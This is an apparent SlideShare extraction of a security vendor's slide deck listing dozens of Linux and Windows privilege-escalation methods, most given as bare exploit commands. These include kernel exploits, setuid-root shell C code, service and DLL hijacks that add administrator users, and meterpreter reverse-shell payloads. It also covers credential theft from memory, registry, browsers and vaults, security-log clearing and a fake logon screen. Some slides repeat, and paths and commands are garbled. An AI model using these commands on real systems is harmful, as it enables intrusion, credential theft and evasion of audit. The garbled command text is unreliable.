SlideShare a Scribd company logo

74 Methods for Privilege Escalation Part 2

Hadess
Hadess

74 Methods for Privilege Escalation - Part 2 The part two of Privilege escalation methods with complete Distributions: 1. DirtyC0w 2. CVE-2016-1531 3. Polkit 4. DirtyPipe 5. PwnKit 6. ms14_058 7. Hot Potato 8. Intel SYSRET 9. Abusing journalctl 10. PrintNightmare 11.Folina 12. ALPC 13. RemotePotato0 14. CVE-2022-26923 15. MS14-068 16. Sudo LD_PRELOAD 17. Abusing File Permission via SUID Binaries - .so injection) 18. DLL Injection 19. Early Bird Injection 20. Process Injection through Memory Section 21. Abusing Scheduled Tasks via Cron Path Overwrite 22. Abusing Scheduled Tasks via Cron Wildcards 23. Abusing File Permission via SUID Binaries - Symlink) 24. Abusing File Permission via SUID Binaries - Environment Variables #1) 25. Abusing File Permission via SUID Binaries - Environment Variables #2) 26. DLL Hijacking 27. Abusing Services via binPath 28. Abusing Services via Unquoted Path 29. Abusing Services via Registry 30. Abusing Services via Executable File 31. Abusing Services via Autorun 32. Abusing Services via AlwaysInstallElevated 33. Abusing Services via SeCreateToken 34. Abusing Services via SeDebug 35. Remote Process via Syscalls (HellsGate|HalosGate) 36. Escalate With DuplicateTokenEx 37. Abusing Services via SeIncreaseBasePriority 38. Abusing Services via SeManageVolume 39. Abusing Services via SeRelabel 40. Abusing Services via SeRestore 41. Abuse via SeBackup 42. Abusing via SeCreatePagefile 43. Abusing via SeSystemEnvironment 44. Abusing via SeTakeOwnership 45. Abusing via SeTcb 46. Abusing via SeTrustedCredManAccess 47. Abusing tokens via SeAssignPrimaryToken 48. Abusing via SeCreatePagefile 49. Certificate Abuse 50. Password Mining in Memory 51. Password Mining in Memory 52. Password Mining in Registry 53. Password Mining in General Events via SeAudit 54. Password Mining in Security Events via SeSecurity 55. Startup Applications 56. Password Mining in McAfeeSitelistFiles 57. Password Mining in CachedGPPPassword 58. Password Mining in DomainGPPPassword 59. Password Mining in KeePass 60. Password Mining in WindowsVault 61. Password Mining in SecPackageCreds 62. Password Mining in PuttyHostKeys 63. Password Mining in RDCManFiles 64. Password Mining in RDPSavedConnections 65. Password Mining in MasterKeys 66. Password Mining in Browsers 67. Password Mining in Files 68. Password Mining in LDAP 69. Password Mining in Clipboard 70. Password Mining in GMSA Password 71. Delegate tokens via RDP 72. Delegate tokens via FTP 73. Fake Logon Screen 74. Abusing WinRM Services

Technology
1 of 81
Download to read offline
74 METHODS FOR PRIVILEGE ESCALATION PART 2 HADESS | SECURE AGILE DEVELOPMENT WWW.HADESS.IO
NO Y/N Yes NO NO NO Y/N Y/N N N N YES YES YES Y/N YES YES YES NO NO Y/N NO Y/N YES No PART 1 SUMMARY HADESS | SECURE AGILE DEVELOPMENT Method DOMAIN APT 1 Abusing Sudo Binaries 2 Abusing Scheduled Tasks 3 Golden Ticket With Scheduled Tasks 4 Abusing Interpreter Capabilities 5 Abusing Binary Capabilities 6 Abusing ActiveSessions Capabilities 7 Escalate with TRUSTWORTHY in SQL Server 8 Abusing Mysql run as root No Method DOMAIN APT 9 Abusing journalctl 10 Abusing VDS 11 Abusing Browser 12 Abusing LDAP 13 LLMNR Poisoning 14 Abusing Certificate Services 15 MySQL UDF Code Injection 16 Impersonation Token with ImpersonateLoggedOnuser No Method DOMAIN APT 17 Impersonation Token with SeImpersontePrivilege 18 Impersonation Token with SeLoadDriverPrivilege 19 OpenVPN Credentials 20 Bash History 21 Package Capture 22 NFS Root Squashing 23 Abusing Access Control List 24 Escalate With SeBackupPrivilege
No PART 1 SUMMARY HADESS | SECURE AGILE DEVELOPMENT Method DOMAIN APT 25 Escalate With SeImpersonatePrivilege YES 26 Escalate With SeLoadDriverPrivilege YES 27 Escalate With ForceChangePassword YES 28 Escalate With GenericWrite YES 29 Abusing GPO YES 30 Pass-the-Ticket YES 31 Golden Ticket YES 32 Abusing Splunk Universal Forwarder NO No Method DOMAIN APT 33 Abusing Gdbus Y/N 34 Abusing Trusted DC YES 35 NTLM Relay YES 36 Exchange Relay YES 37 Dumping with diskshadow YES 38 Dumping with vssadmin YES 39 Password Spraying Y/N 40 AS-REP Roasting YES
PART 2
Domain: No Local Admin: Yes OS: Linux Type: 0/1 Exploit gcc -pthread c0w.c -o c0w; ./c0w; passwd; id DIRTYC0W HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Linux Type: 0/1 Exploit CVE-2016-1531.sh;id CVE-2016-1531 HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Linux Type: 0/1 Exploit https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege- Esclation poc.sh POLKIT HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Linux Type: 0/1 Exploit ./traitor-amd64 --exploit kernel:CVE-2022-0847 Whoami;id DIRTYPIPE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Linux Type: 0/1 Exploit ./cve-2021-4034 Whoami;id PWNKIT HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: 0/1 Exploit msf > use exploit/windows/local/ms14_058_track_popup_menu msf exploit(ms14_058_track_popup_menu) > set TARGET < target-id > msf exploit(ms14_058_track_popup_menu) > exploit MS14_058 HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: 0/1 Exploit In command prompt type: powershell.exe -nop -ep bypass In Power Shell prompt type: Import-Module C:UsersUserDesktopToolsTaterTater.ps1 In Power Shell prompt type: Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add" To confirm that the attack was successful, in Power Shell prompt type: net localgroup administrators HOT POTATO HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: 0/1 Exploit execute -H -f sysret.exe -a "-pid [pid]” INTEL SYSRET HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Yes Local Admin: Yes OS: Windows Type: 0/1 Exploit https://github.com/outflanknl/PrintNightmare PrintNightmare 10.10.10.10 exp.dll PRINTNIGHTMARE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: 0/1 Exploit https://github.com/JohnHammond/msdt-follina python3 follina.py -c "notepad" FOLINA HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: 0/1 Exploit https://github.com/riparino/Task_Scheduler_ALPC ALPC HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: 0/1 Exploit sudo ntlmrelayx.py -t ldap://10.0.0.10 --no-wcf-server --escalate-user normal_user .RemotePotato0.exe -m 0 -r 10.0.0.20 -x 10.0.0.20 -p 9999 -s 1 REMOTEPOTATO0 HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: 0/1 Exploit certipy req 'lab.local/cve$:CVEPassword1234*@10.100.10.13' -template Machine -dc-ip 10.10.10.10 -ca lab-ADCS-CA Rubeus.exe asktgt /user:"TARGET_SAMNAME" /certificate:cert.pfx /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show CVE-2022-26923 HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: 0/1 Exploit python ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841- 771695929-1514560438-1103 -d dc-a-2003.dom-a.loc MS14-068 HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Linux Type: Enumeration & Hunt ps -ef | grep ftp; gdp -p ftp_id info proc mappings q dump memory /tmp/mem [start] [end] q strings /tmp/mem | grep passw PASSWORD MINING IN MEMORY(LINUX) HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt In Metasploit (msf > prompt) type: use auxiliary/server/capture/http_basic In Metasploit (msf > prompt) type: set uripath x In Metasploit (msf > prompt) type: run In taskmgr and right-click on the “iexplore.exe” in the “Image Name” column and select “Create Dump File” from the popup menu. strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic" Select the Copy the Base64 encoded string. In command prompt type: echo -ne [Base64 String] | base64 -d 1 2. 3. PASSWORD MINING IN MEMORY(WINDOWS) HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt Open command and type: reg query "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v DefaultUsername In command prompt type: reg query "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v DefaultPassword Notice the credentials, from the output. In command prompt type: reg query HKEY_CURRENT_USERSoftwareSimonTathamPuTTYSessionsBWP123F42 -v ProxyUsername In command prompt type: reg query HKEY_CURRENT_USERSoftwareSimonTathamPuTTYSessionsBWP123F42 -v ProxyPassword In command prompt type: reg query HKEY_CURRENT_USERSoftwareTightVNCServer /v Password In command prompt type: reg query HKEY_CURRENT_USERSoftwareTightVNCServer /v PasswordViewOnly Make note of the encrypted passwords and type: C:UsersUserDesktopToolsvncpwdvncpwd.exe [Encrypted Password] From the output, make note of the credentials. 1. 2. 3. 4. 5. 6. Notice the credentials, from the output. 7. 8. 9. 10. PASSWORD MINING IN REGISTRY HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt ./WELA.ps1 -LogFile .Security.evtx -EventIDStatistics flog -s 10s -n 200 invoke-module LogCleaner.ps1 Or PASSWORD MINING IN GENERAL EVENTS VIA SEAUDIT HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt ./WELA.ps1 -LogFile .Security.evtx -EventIDStatistics flog -s 10s -n 200 wevtutil cl Security Or PASSWORD MINING IN SECURITY EVENTS VIA SESECURITY HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt In Metasploit (msf > prompt) type: use multi/handler In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address] In Metasploit (msf > prompt) type: run Open another command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Kali VM IP Address] -f exe -o x.exe Place x.exe in “C:ProgramDataMicrosoftWindowsStart MenuProgramsStartup”. 1. 2. STARTUP APPLICATIONS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt SharpUp.exe McAfeeSitelistFiles PASSWORD MINING IN MCAFEESITELISTFILES HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt SharpUp.exe CachedGPPPassword PASSWORD MINING IN CACHEDGPPPASSWORD HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt SharpUp.exe DomainGPPPassword PASSWORD MINING IN DOMAINGPPPASSWORD HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt Seatbelt.exe keepass KeeTheft.exe Or PASSWORD MINING IN KEEPASS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt Seatbelt.exe WindowsVault PASSWORD MINING IN WINDOWSVAULT HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt Seatbelt.exe SecPackageCreds PASSWORD MINING IN SECPACKAGECREDS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt Seatbelt.exe PuttyHostKeys PASSWORD MINING IN PUTTYHOSTKEYS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt Seatbelt.exe RDCManFiles PASSWORD MINING IN RDCMANFILES HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt Seatbelt.exe RDPSavedConnections PASSWORD MINING IN RDPSAVEDCONNECTIONS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt SharpDPAPI masterkeys PASSWORD MINING IN MASTERKEYS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt SharpWeb.exe all PASSWORD MINING IN BROWSERS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt SauronEye.exe -d C:UsersvincentDesktop --filetypes .txt .doc .docx .xls --contents --keywords password pass* -v` PASSWORD MINING IN FILES HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt SharpLDAPSearch.exe "(&(objectClass=user)(cn=*svc*))" "samaccountname" Import-Module .PowerView.ps1 Get-DomainComputer COMPUTER -Properties ms-mcs- AdmPwd,ComputerName,ms-mcs-AdmPwdExpirationTime Or PASSWORD MINING IN LDAP HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Enumeration & Hunt execute-assembly /root/SharpClipHistory.exe PASSWORD MINING IN CLIPBOARD HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Delegate tokens GMSAPasswordReader.exe --accountname SVC_SERVICE_ACCOUNT PASSWORD MINING IN GMSA PASSWORD HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: Delegate tokens ./fake_rdp.py pyrdp-mitm.py 192.168.1.10 -k private_key.pem -c certificate.pem Or DELEGATE TOKENS VIA RDP HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: Delegate tokens FakeFtpServer fakeFtpServer = new FakeFtpServer(); fakeFtpServer.addUserAccount(new UserAccount("user", "password", "c:data")); FileSystem fileSystem = new WindowsFakeFileSystem(); fileSystem.add(new DirectoryEntry("c:data")); fileSystem.add(new FileEntry("c:datafile1.txt", "abcdef 1234567890")); fileSystem.add(new FileEntry("c:datarun.exe")); fakeFtpServer.setFileSystem(fileSystem); fakeFtpServer.start(); DELEGATE TOKENS VIA FTP HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Phish execute-assembly fakelogonscreen.exe FAKE LOGON SCREEN HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Service RogueWinRM.exe -p C:windowssystem32cmd.exe ABUSING WINRM SERVICES HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Yes Local Admin: Yes OS: Windows Type: Abuse Certificate ceritify.exe request /ca:dc.domain.localDC-CA /template:User… Rubeus.exe asktgy /user:CORPitadmin /certificate:C:cert.pfx /password:password CERTIFICATE ABUSE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Linux Type: Injection gcc -fPIC -shared -o /tmp/ldreload.so ldreload.c -nostartfiles sudo LD_RELOAD=tmp/ldreload.so apache2 id 1. #include <stdio.h> #include <sys/types.h> #include <stdlib.h> void _init() { unsetenv("LD_PRELOAD"); setgid(0); setuid(0); system("/bin/bash"); } 2. 3. 4. SUDO LD_PRELOAD HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Linux Type: Injection Mkdir /home/user/.config gcc -shared -o /home/user/.config/libcalc.so - fPIC/home/user/.config/libcalc.c /usr/local/bin/suid-so id 1. 2. #include <stdio.h> #include <stdlib.h> static void inject() _attribute _((constructor)); void inject() { system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p"); } 3. 4. 5. ABUSING FILE PERMISSION VIA SUID BINARIES - (.SO INJECTION) HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: Injection 1. RemoteDLLInjector64 Or MemJect Or https://github.com/tomcarver16/BOF-DLL-Inject 2. #define PROCESS_NAME "csgo.exe" Or RemoteDLLInjector64.exe pid C:runforpriv.dll Or mandllinjection ./runforpriv.dll pid DLL INJECTION HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Injection hollow svchost.exe pop.bin EARLY BIRD INJECTION HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Injection sec-shinject PID /path/to/bin PROCESS INJECTION THROUGH MEMORY SECTION HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Linux Type: Abusing Scheduled Tasks echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > systemupdate.sh; chmod +x systemupdate.sh Wait a while /tmp/bash -p id && whoami ABUSING SCHEDULED TASKS VIA CRON PATH OVERWRITE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Linux Type: Abusing Scheduled Tasks echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/systemupdate.sh; touch /home/user/ --checkpoint=1; touch /home/user/ --checkpoint-action=exec=shsystemupdate.sh Wait a while /tmp/bash -p id && whoami ABUSING SCHEDULED TASKS VIA CRON WILDCARDS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Linux Type: Abusing File Permission su - www-data; nginxed-root.sh /var/log/nginx/error.log; In root user invoke-rc.d nginx rotate >/dev/null 2>&1 1. 2. 3. ABUSING FILE PERMISSION VIA SUID BINARIES - SYMLINK) HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Linux Type: Abusing File Permission su - www-data; nginxed-root.sh /var/log/nginx/error.log; In root user invoke-rc.d nginx rotate >/dev/null 2>&1 1. 2. 3. ABUSING FILE PERMISSION VIA SUID BINARIES - SYMLINK) HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Linux Type: Abusing File Permission 1. echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' >/tmp/service.c; 2. gcc /tmp/services.c -o /tmp/service; 3. export PATH=/tmp:$PATH; 4. /usr/local/bin/sudi-env; id ABUSING FILE PERMISSION VIA SUID BINARIES - ENVIRONMENT VARIABLES #1) HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Linux Type: Abusing File Permission env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +S /tmp/bash)' /bin/sh -c /usr/local/bin/suid-env2; set +x; /tmp/bash -p' ABUSING FILE PERMISSION VIA SUID BINARIES - ENVIRONMENT VARIABLES #2) HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Abuse Privilege Windows_dll.c: cmd.exe /k net localgroup administrators user /add x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll sc stop dllsvc & sc start dllsvc 1. 2. 3. DLL HIJACKING HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Abuse Privilege sc config daclsvc binpath= "net localgroup administrators user /add" sc start daclsvc 1. 2. ABUSING SERVICES VIA BINPATH HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Abuse Privilege msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe Place common.exe in ‘C:Program FilesUnquoted Path Service’. sc start unquotedsvc 1. 2. 3. ABUSING SERVICES VIA UNQUOTED PATH HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Abuse Privilege reg add HKLMSYSTEMCurrentControlSetservicesregsvc /v ImagePath /t REG_EXPAND_SZ /d c:tempx.exe /f sc start regsvc 1. 2. ABUSING SERVICES VIA REGISTRY HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Abuse Privilege copy /y c:Tempx.exe "c:Program FilesFile Permissions Servicefilepermservice.exe" sc start filepermsvc 1. 2. ABUSING SERVICES VIA EXECUTABLE FILE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Abuse Privilege 1. In Metasploit (msf > prompt) type: use multi/handler In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address] In Metasploit (msf > prompt) type: run Open an additional command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe -o program.exe 2. Place program.exe in ‘C:Program FilesAutorun Program’. ABUSING SERVICES VIA AUTORUN HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: No Local Admin: Yes OS: Windows Type: Abuse Privilege 1. msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f msi-nouac -o setup.msi 2. msiexec /quiet /qn /i C:Tempsetup.msi Or SharpUp.exe AlwaysInstallElevated ABUSING SERVICES VIA ALWAYSINSTALLELEVATED HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege 1. .load C:devPrivEditorx64ReleasePrivEditor.dll 2. !rmpriv ABUSING SERVICES VIA SECREATETOKEN HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege 1. Conjure-LSASS Or syscall_enable_priv 20 ABUSING SERVICES VIA SEDEBUG HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege injectEtwBypass pid REMOTE PROCESS VIA SYSCALLS (HELLSGATE|HALOSGATE) HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege PrimaryTokenTheft.exe pid TokenPlaye.exe --impersonate --pid pid Or ESCALATE WITH DUPLICATETOKENEX HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege start /realtime SomeCpuIntensiveApp.exe ABUSING SERVICES VIA SEINCREASEBASEPRIORITY HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege Just only compile and run SeManageVolumeAbuse ABUSING SERVICES VIA SEMANAGEVOLUME HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege WRITE_OWNER access to a resource, including files and folders. Run for privilege escalation 1. 2. ABUSING SERVICES VIA SERELABEL HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege 1. Launch PowerShell/ISE with the SeRestore privilege present. 2. Enable the privilege with Enable-SeRestorePrivilege). 3. Rename utilman.exe to utilman.old 4. Rename cmd.exe to utilman.exe 5. Lock the console and press Win+U ABUSING SERVICES VIA SERESTORE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege 1. In Metasploit (msf > prompt) type: use auxiliary/server/capture/http_basic In Metasploit (msf > prompt) type: set uripath x In Metasploit (msf > prompt) type: run 2. In taskmgr and right-click on the “iexplore.exe” in the “Image Name” column and select “Create Dump File” from the popup menu. 3. strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic" Select the Copy the Base64 encoded string. In command prompt type: echo -ne [Base64 String] | base64 -d ABUSE VIA SEBACKUP HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege HIBR2BIN /PLATFORM X64 /MAJOR 6 /MINOR 1 /INPUT hiberfil.sys /OUTPUT uncompressed.bin ABUSING VIA SECREATEPAGEFILE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege .load C:devPrivEditorx64ReleasePrivEditor.dll TrustExec.exe -m exec -c "whoami /priv" -f 1. 2. ABUSING VIA SESYSTEMENVIRONMENT HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege 1. takeown.exe /f "%windir%system32" 2. icalcs.exe "%windir%system32" /grant "%username%":F 3. Rename cmd.exe to utilman.exe 4. Lock the console and press Win+U ABUSING VIA SETAKEOWNERSHIP HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege PSBits PrivFu psexec.exe -i -s -d cmd.exe 1. Or 2. ABUSING VIA SETCB HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege .load C:devPrivEditorx64ReleasePrivEditor.dll CredManBOF TrustExec.exe -m exec -c "whoami /priv" -f 1. Or 2. ABUSING VIA SETRUSTEDCREDMANACCESS HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege JuicyPotato.exe Or https://github.com/decoder-it/juicy_2 https://github.com/antonioCoco/RoguePotato ABUSING TOKENS VIA SEASSIGNPRIMARYTOKEN HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
Domain: Y/N Local Admin: Yes OS: Windows Type: Abuse Privilege ./WELA.ps1 -LogFile .Security.evtx -EventIDStatistics flog -s 10s -n 200 invoke-module LogCleaner.ps1 1. 2. Or ABUSING VIA SECREATEPAGEFILE HADESS | SECURE AGILE DEVELOPMENT Difficulty APT Used Detection
HADESS | SECURE AGILE DEVELOPMENT About Hadess Savior of your Business to combat cyber threats Hadess performs offensive cybersecurity services through infrastructures and software that include vulnerability analysis, scenario attack planning, and implementation of custom integrated preventive projects. We organized our activities around the prevention of corporate, industrial, and laboratory cyber threats. Contact Us To request additional information about Hadess’s services, please fill out the form below. A Hadess representative will contact you shortly. Email: Marketing@hadess.io Phone No. +989362181112 Company No. +982128427515 +982177873383 Website: www.hadess.io hadess_security
HADESS | SECURE AGILE DEVELOPMENT Hadess Products and Services Fully assess your organization’s threat detection and response capabilities with a simulated cyber-attack. Penetration Testing | PROTECTION PRO Fully assess your organization’s threat detection and response capabilities with a simulated cyber-attack. Red Teaming Operation | PROTECTION PRO Identifying and helping to address hidden weaknesses in your organization’s security. RASP | Protect Applications and APIs Anywhere Identifying and helping to address hidden weaknesses in your Applications. SAST | Audit Your Products Identifying and helping to address hidden weaknesses in your organization’s security PWN Z1 | Audit Your PPP
HADESS Secure Agile Development

Recommended

VXLAN Integration with CloudStack Advanced Zone
VXLAN Integration with CloudStack Advanced ZoneVXLAN Integration with CloudStack Advanced Zone
VXLAN Integration with CloudStack Advanced Zone
Yoshikazu Nojima
 
OpenvswitchでVPS
OpenvswitchでVPSOpenvswitchでVPS
OpenvswitchでVPS
Daisuke Nakajima
 
Basic of virtual memory of Linux
Basic of virtual memory of LinuxBasic of virtual memory of Linux
Basic of virtual memory of Linux
Tetsuyuki Kobayashi
 
Windowsのパケットモニタ作成
Windowsのパケットモニタ作成Windowsのパケットモニタ作成
Windowsのパケットモニタ作成
Shinichi Hirauchi
 
Openflow実験
Openflow実験Openflow実験
Openflow実験
Yahoo!デベロッパーネットワーク
 
A Distributed Malware Analysis System Cuckoo Sandbox
A Distributed Malware Analysis System Cuckoo SandboxA Distributed Malware Analysis System Cuckoo Sandbox
A Distributed Malware Analysis System Cuckoo Sandbox
Andy Lee
 
ゼロから学ぶIoTハンズオン資料
ゼロから学ぶIoTハンズオン資料ゼロから学ぶIoTハンズオン資料
ゼロから学ぶIoTハンズオン資料
Masaru Takahashi
 
OpenStack with OpenFlow
OpenStack with OpenFlowOpenStack with OpenFlow
OpenStack with OpenFlow
Toshiki Tsuboi
 

Recommended

VXLAN Integration with CloudStack Advanced Zone
VXLAN Integration with CloudStack Advanced ZoneVXLAN Integration with CloudStack Advanced Zone
VXLAN Integration with CloudStack Advanced Zone
Yoshikazu Nojima
 
OpenvswitchでVPS
OpenvswitchでVPSOpenvswitchでVPS
OpenvswitchでVPS
Daisuke Nakajima
 
Basic of virtual memory of Linux
Basic of virtual memory of LinuxBasic of virtual memory of Linux
Basic of virtual memory of Linux
Tetsuyuki Kobayashi
 
Windowsのパケットモニタ作成
